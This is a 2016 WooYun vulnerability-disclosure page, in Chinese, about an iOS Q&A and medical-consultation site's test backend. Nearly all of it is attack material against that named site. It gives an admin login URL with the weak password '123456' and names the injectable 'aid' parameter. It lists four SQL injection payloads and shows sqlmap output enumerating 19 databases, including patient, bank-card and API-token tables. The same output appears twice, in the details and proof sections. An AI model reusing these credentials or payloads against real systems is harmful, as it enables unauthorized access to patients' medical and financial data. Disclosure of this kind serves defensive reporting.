当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168472

漏洞标题:ios问答网后台弱口令加SQL注入

相关厂商:ios问答网

漏洞作者: 路人甲

提交时间:2016-01-08 17:46

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-02-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

ios问答网后台弱口令加SQL注入

详细说明:

http://test.iosask.cn/dgws/
admin 123456
http://test.iosask.cn/dgws/home/mycure/patientinfo?aid=734
参数aid存在注入

Parameter: aid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: aid=734' AND 6072=6072 AND 'iEao'='iEao
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: aid=734' AND (SELECT 5706 FROM(SELECT COUNT(*),CONCAT(0x716b627071,(SELECT (ELT(5706=5706,1))),0x717a626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'mgKj'='mgKj
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: aid=734';(SELECT * FROM (SELECT(SLEEP(5)))PfLV)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: aid=734' AND (SELECT * FROM (SELECT(SLEEP(5)))YeFt) AND 'RCiv'='RCiv
---
web application technology: Apache 2.4.4
back-end DBMS: MySQL 5.0
available databases [19]:
[*] db_admin
[*] db_api
[*] db_auth
[*] db_bug
[*] db_doctor
[*] db_file
[*] db_log
[*] db_msg
[*] db_query
[*] db_room
[*] db_sys
[*] db_uc
[*] db_uc_web
[*] db_user
[*] db_user_web
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
Database: db_admin
[16 tables]
+----------------------------------------------+
| t_admin_article |
| t_admin_article_picture |
| t_admin_banner_picture |
| t_admin_info |
| t_admin_level |
| t_admin_login_info |
| t_admin_operation_info |
| t_admin_programa |
| t_admin_work_calender |
| t_admin_work_notice |
| t_doctor_admin_appointment |
| t_user_question_answer |
| t_user_question_info |
| t_website_column_info |
| t_website_content |
| t_website_leave_msg |
+----------------------------------------------+
Database: db_log
[33 tables]
+----------------------------------------------+
| t_log_ad_click |
| t_log_admin_op |
| t_log_admin_work_calender |
| t_log_apns_push |
| t_log_apns_push_count |
| t_log_apns_push_fail |
| t_log_diagnosis_record |
| t_log_diagnosis_record_sugguest |
| t_log_doctor_appointment |
| t_log_doctor_appointment_dt |
| t_log_doctor_assistant_phone |
| t_log_doctor_refuse_inquiry |
| t_log_doctor_withdrawal |
| t_log_input_medical_record |
| t_log_msg |
| t_log_patient_activist_info |
| t_log_patient_auxiliary_check |
| t_log_patient_auxiliary_record |
| t_log_patient_diagnosis_evaluate |
| t_log_pwd_retrieve |
| t_log_receipt |
| t_log_tns |
| t_log_user_account_freeze |
| t_log_user_active |
| t_log_user_login |
| t_log_user_online |
| t_log_user_online_count |
| t_log_user_refund_op |
| t_log_user_refund_order |
| t_log_user_reg |
| t_log_user_reg_count |
| t_log_user_sms |
| t_log_user_value_change |
+----------------------------------------------+
Database: db_auth
[4 tables]
+----------------------------------------------+
| t_auth_group |
| t_auth_group_access |
| t_auth_rule |
| t_user |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| mutex_instances |
| performance_timers |
| rwlock_instances |
| setup_consumers |
| setup_instruments |
| setup_timers |
| threads |
+----------------------------------------------+
Database: db_bug
[3 tables]
+----------------------------------------------+
| t_log_android_bugs |
| t_log_ios_bugs |
| t_server_gk_ip |
+----------------------------------------------+
Database: db_sys
[11 tables]
+----------------------------------------------+
| t_client_version_info |
| t_pes_info |
| t_pgks_info |
| t_sys_ad_cfg |
| t_sys_auxiliary_cfg |
| t_sys_auxiliary_cfg_copy |
| t_sys_channel_cfg |
| t_sys_nation_cfg |
| t_sys_picture |
| t_sys_process_cfg |
| t_sys_province |
+----------------------------------------------+
Database: db_doctor
[43 tables]
+----------------------------------------------+
| 医生信息 |
| 医院信息 |
| t_appointment_auxiliary_check |
| t_appointment_diagnosis_picture |
| t_appointment_material_remind |
| t_assistant_doctor_info |
| t_department_disease_cfg |
| t_disease_auxiliary_check |
| t_doctor_appointment |
| t_doctor_appointment_apply |
| t_doctor_appointment_dt |
| t_doctor_appointment_ex |
| t_doctor_appointment_label |
| t_doctor_appointment_tourist |
| t_doctor_appointment_upd |
| t_doctor_auxiliary_check |
| t_doctor_case |
| t_doctor_cure_disease |
| t_doctor_department_apply |
| t_doctor_department_info |
| t_doctor_department_picture |
| t_doctor_diagnosis_record |
| t_doctor_disease_detail |
| t_doctor_hospital_info |
| t_doctor_info |
| t_doctor_message |
| t_doctor_power |
| t_doctor_recommend_pool |
| t_doctor_refuse_inquiry |
| t_doctor_team_fees |
| t_doctor_withdrawal |
| t_label_info |
| t_medical_record_remark |
| t_patient_activist_info |
| t_patient_auxiliary_check |
| t_patient_diagnosis_evaluate |
| t_patient_drug_plan |
| t_patient_history_info |
| t_patient_info |
| t_patient_operation_plan |
| t_patient_physical_plan |
| t_patient_visit_record |
| v_doctor_base_info |
+----------------------------------------------+
Database: db_msg
[3 tables]
+----------------------------------------------+
| t_appointment_pecipe_msg |
| t_msg_cache |
| t_msg_ios_devicetoken |
+----------------------------------------------+
Database: db_room
[1 table]
+----------------------------------------------+
| t_room_record |
+----------------------------------------------+
Database: db_api
[4 tables]
+----------------------------------------------+
| t_api_config |
| t_api_info |
| t_api_token |
| t_tns_push |
+----------------------------------------------+
Current database
[1 table]
+----------------------------------------------+
| t_patient_order_info |
+----------------------------------------------+
Database: db_uc_web
[2 tables]
+----------------------------------------------+
| t_user_refund_op |
| t_user_refund_order |
+----------------------------------------------+
Database: db_user_web
[3 tables]
+----------------------------------------------+
| t_user_bank_card |
| t_user_collect |
| t_user_label |
+----------------------------------------------+
Database: db_user
[5 tables]
+----------------------------------------------+
| t_user_authen |
| t_user_location |
| t_user_profile |
| t_user_status |
| v_user_base_info |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------+
Database: db_uc
[7 tables]
+----------------------------------------------+
| t_doctor_bill |
| t_user_account_freeze |
| t_user_commonpay_receipt |
| t_user_config |
| t_user_currency_value |
| t_user_recharge_record |
| t_user_refund_order |
+----------------------------------------------+
Database: db_file
[1 table]
+----------------------------------------------+
| t_file |
+----------------------------------------------+
Database: information_schema
[40 tables]
+----------------------------------------------+
| None |
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+----------------------------------------------+
Database: db_query
[15 tables]
+----------------------------------------------+
| t_sys_reg_time_bucket |
| t_sys_sms_info |
| t_sys_sms_receive_dt |
| t_uid_account |
| t_uid_assign |
| t_uid_release_cfg |
| t_uid_release_info |
| t_uid_unassign |
| t_user_avatar_authen |
| t_user_device_install |
| t_user_kefu_notice |
| t_user_login |
| t_user_power_info |
| t_user_sms_shield |
| t_user_uninstall |
+----------------------------------------------+

漏洞证明:

http://test.iosask.cn/dgws/
admin 123456
http://test.iosask.cn/dgws/home/mycure/patientinfo?aid=734
参数aid存在注入

Parameter: aid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: aid=734' AND 6072=6072 AND 'iEao'='iEao
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: aid=734' AND (SELECT 5706 FROM(SELECT COUNT(*),CONCAT(0x716b627071,(SELECT (ELT(5706=5706,1))),0x717a626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'mgKj'='mgKj
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: aid=734';(SELECT * FROM (SELECT(SLEEP(5)))PfLV)#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: aid=734' AND (SELECT * FROM (SELECT(SLEEP(5)))YeFt) AND 'RCiv'='RCiv
---
web application technology: Apache 2.4.4
back-end DBMS: MySQL 5.0
available databases [19]:
[*] db_admin
[*] db_api
[*] db_auth
[*] db_bug
[*] db_doctor
[*] db_file
[*] db_log
[*] db_msg
[*] db_query
[*] db_room
[*] db_sys
[*] db_uc
[*] db_uc_web
[*] db_user
[*] db_user_web
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
Database: db_admin
[16 tables]
+----------------------------------------------+
| t_admin_article |
| t_admin_article_picture |
| t_admin_banner_picture |
| t_admin_info |
| t_admin_level |
| t_admin_login_info |
| t_admin_operation_info |
| t_admin_programa |
| t_admin_work_calender |
| t_admin_work_notice |
| t_doctor_admin_appointment |
| t_user_question_answer |
| t_user_question_info |
| t_website_column_info |
| t_website_content |
| t_website_leave_msg |
+----------------------------------------------+
Database: db_log
[33 tables]
+----------------------------------------------+
| t_log_ad_click |
| t_log_admin_op |
| t_log_admin_work_calender |
| t_log_apns_push |
| t_log_apns_push_count |
| t_log_apns_push_fail |
| t_log_diagnosis_record |
| t_log_diagnosis_record_sugguest |
| t_log_doctor_appointment |
| t_log_doctor_appointment_dt |
| t_log_doctor_assistant_phone |
| t_log_doctor_refuse_inquiry |
| t_log_doctor_withdrawal |
| t_log_input_medical_record |
| t_log_msg |
| t_log_patient_activist_info |
| t_log_patient_auxiliary_check |
| t_log_patient_auxiliary_record |
| t_log_patient_diagnosis_evaluate |
| t_log_pwd_retrieve |
| t_log_receipt |
| t_log_tns |
| t_log_user_account_freeze |
| t_log_user_active |
| t_log_user_login |
| t_log_user_online |
| t_log_user_online_count |
| t_log_user_refund_op |
| t_log_user_refund_order |
| t_log_user_reg |
| t_log_user_reg_count |
| t_log_user_sms |
| t_log_user_value_change |
+----------------------------------------------+
Database: db_auth
[4 tables]
+----------------------------------------------+
| t_auth_group |
| t_auth_group_access |
| t_auth_rule |
| t_user |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| mutex_instances |
| performance_timers |
| rwlock_instances |
| setup_consumers |
| setup_instruments |
| setup_timers |
| threads |
+----------------------------------------------+
Database: db_bug
[3 tables]
+----------------------------------------------+
| t_log_android_bugs |
| t_log_ios_bugs |
| t_server_gk_ip |
+----------------------------------------------+
Database: db_sys
[11 tables]
+----------------------------------------------+
| t_client_version_info |
| t_pes_info |
| t_pgks_info |
| t_sys_ad_cfg |
| t_sys_auxiliary_cfg |
| t_sys_auxiliary_cfg_copy |
| t_sys_channel_cfg |
| t_sys_nation_cfg |
| t_sys_picture |
| t_sys_process_cfg |
| t_sys_province |
+----------------------------------------------+
Database: db_doctor
[43 tables]
+----------------------------------------------+
| 医生信息 |
| 医院信息 |
| t_appointment_auxiliary_check |
| t_appointment_diagnosis_picture |
| t_appointment_material_remind |
| t_assistant_doctor_info |
| t_department_disease_cfg |
| t_disease_auxiliary_check |
| t_doctor_appointment |
| t_doctor_appointment_apply |
| t_doctor_appointment_dt |
| t_doctor_appointment_ex |
| t_doctor_appointment_label |
| t_doctor_appointment_tourist |
| t_doctor_appointment_upd |
| t_doctor_auxiliary_check |
| t_doctor_case |
| t_doctor_cure_disease |
| t_doctor_department_apply |
| t_doctor_department_info |
| t_doctor_department_picture |
| t_doctor_diagnosis_record |
| t_doctor_disease_detail |
| t_doctor_hospital_info |
| t_doctor_info |
| t_doctor_message |
| t_doctor_power |
| t_doctor_recommend_pool |
| t_doctor_refuse_inquiry |
| t_doctor_team_fees |
| t_doctor_withdrawal |
| t_label_info |
| t_medical_record_remark |
| t_patient_activist_info |
| t_patient_auxiliary_check |
| t_patient_diagnosis_evaluate |
| t_patient_drug_plan |
| t_patient_history_info |
| t_patient_info |
| t_patient_operation_plan |
| t_patient_physical_plan |
| t_patient_visit_record |
| v_doctor_base_info |
+----------------------------------------------+
Database: db_msg
[3 tables]
+----------------------------------------------+
| t_appointment_pecipe_msg |
| t_msg_cache |
| t_msg_ios_devicetoken |
+----------------------------------------------+
Database: db_room
[1 table]
+----------------------------------------------+
| t_room_record |
+----------------------------------------------+
Database: db_api
[4 tables]
+----------------------------------------------+
| t_api_config |
| t_api_info |
| t_api_token |
| t_tns_push |
+----------------------------------------------+
Current database
[1 table]
+----------------------------------------------+
| t_patient_order_info |
+----------------------------------------------+
Database: db_uc_web
[2 tables]
+----------------------------------------------+
| t_user_refund_op |
| t_user_refund_order |
+----------------------------------------------+
Database: db_user_web
[3 tables]
+----------------------------------------------+
| t_user_bank_card |
| t_user_collect |
| t_user_label |
+----------------------------------------------+
Database: db_user
[5 tables]
+----------------------------------------------+
| t_user_authen |
| t_user_location |
| t_user_profile |
| t_user_status |
| v_user_base_info |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------+
Database: db_uc
[7 tables]
+----------------------------------------------+
| t_doctor_bill |
| t_user_account_freeze |
| t_user_commonpay_receipt |
| t_user_config |
| t_user_currency_value |
| t_user_recharge_record |
| t_user_refund_order |
+----------------------------------------------+
Database: db_file
[1 table]
+----------------------------------------------+
| t_file |
+----------------------------------------------+
Database: information_schema
[40 tables]
+----------------------------------------------+
| None |
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+----------------------------------------------+
Database: db_query
[15 tables]
+----------------------------------------------+
| t_sys_reg_time_bucket |
| t_sys_sms_info |
| t_sys_sms_receive_dt |
| t_uid_account |
| t_uid_assign |
| t_uid_release_cfg |
| t_uid_release_info |
| t_uid_unassign |
| t_user_avatar_authen |
| t_user_device_install |
| t_user_kefu_notice |
| t_user_login |
| t_user_power_info |
| t_user_sms_shield |
| t_user_uninstall |
+----------------------------------------------+

修复方案:

这个你们比我更专业。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝